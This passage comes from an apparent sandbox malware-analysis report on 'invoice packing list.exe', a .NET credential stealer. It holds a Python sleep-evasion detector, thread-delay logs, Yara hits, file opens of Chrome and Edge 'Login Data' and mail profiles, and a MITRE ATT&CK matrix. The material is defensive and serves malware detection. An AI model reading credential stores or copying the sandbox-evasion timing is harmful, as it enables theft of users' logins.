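            tid, ms = int(m.group(1)), int(m.group(2))
            stats.setdefault(tid, SleepStats(tid)).delays_ms.append(ms)
            continue
        m = COUNT_RE.search(line)
        if m:
            tid, n = int(m.group(1)), int(m.group(2))
            s = stats.setdefault(tid, SleepStats(tid))
            s.sleep_count = max(s.sleep_count, n)
    return stats


def findings(s: SleepStats) -> list:
    out = []
    if s.has_infinite_sentinel:
        out.append("effectively infinite sleep requested (TimeSpan.MaxValue or > 1 year)")
    if s.max_finite_ms >= LONG_SLEEP_MS:
        out.append(f"long sleep: {s.max_finite_ms / 60000:.1f} min")
    if s.longest_deadline_run >= 3:
        out.append(f"deadline re-sleep loop ({s.longest_deadline_run} shrinking requests): resists sleep skipping")
    if s.sleep_count > MANY_SLEEPS:
        out.append(f"{s.sleep_count} short sleeps: stalling loop")
    return out


def is_evasive(s: SleepStats) -> bool:
    return bool(findings(s))


if __name__ == "__main__":
    for tid, s in sorted(analyze_sleep_rows(SAMPLE_ROWS).items()):
        print(tid, findings(s) or ["nothing notable"])
```

Two caveats when weighing this section as a whole. The memory-write-watch allocations and the repeated NOOPENFILEERRORBOX error-mode changes listed above are routinely produced by the .NET runtime itself for managed executables (garbage-collector heap setup and assembly loading), so for a C# sample they add little on their own; the sleep pattern, the Yara hits and the stealer behaviour in the other sections are the evidence that carries the verdict. And because the deadline loop keys on wall-clock time, a sandbox that only patches Sleep has to also fake the clock (GetTickCount, QueryPerformanceCounter, DateTime.Now) consistently to make this sample proceed within the analysis window.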
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 599078
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598969
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598441
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598323
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598182
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 598074
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597969
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 597110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 596110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 595110
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594985
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594735
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594610
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594485
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594360
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\invoice packing list.exe | Thread delayed: delay time: 594110
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 593985Jump to behavior
          Source: C:\Users\user\Desktop\invoice packing list.exeThread delayed: delay time: 593860Jump to behavior
          Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd50c266b4e61c<
          Source: invoice packing list.exe, 00000005.00000002.4489346212.0000000001165000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\invoice packing list.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice packing list.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice packing list.exe | Memory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exe | Process created: C:\Users\user\Desktop\invoice packing list.exe "C:\Users\user\Desktop\invoice packing list.exe"
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Users\user\Desktop\invoice packing list.exe VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Users\user\Desktop\invoice packing list.exe VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice packing list.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4490656225.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4490656225.0000000003228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          Source: C:\Users\user\Desktop\invoice packing list.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\invoice packing list.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\invoice packing list.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\user\Desktop\invoice packing list.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

          Remote Access Functionality

          Source: Yara match | File source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4490656225.0000000003199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4490656225.0000000003228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR
          MITRE ATT&CK Matrix

          Techniques are listed per tactic column; the number in parentheses is the count of report signatures matched to that technique, and techniques without a count were not observed for this sample.

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
          Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: Query Registry (1); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); System Information Discovery (13); System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: Email Collection (1); Input Capture (1); Archive Collected Data (11); Data from Local System (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Command and Control: Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.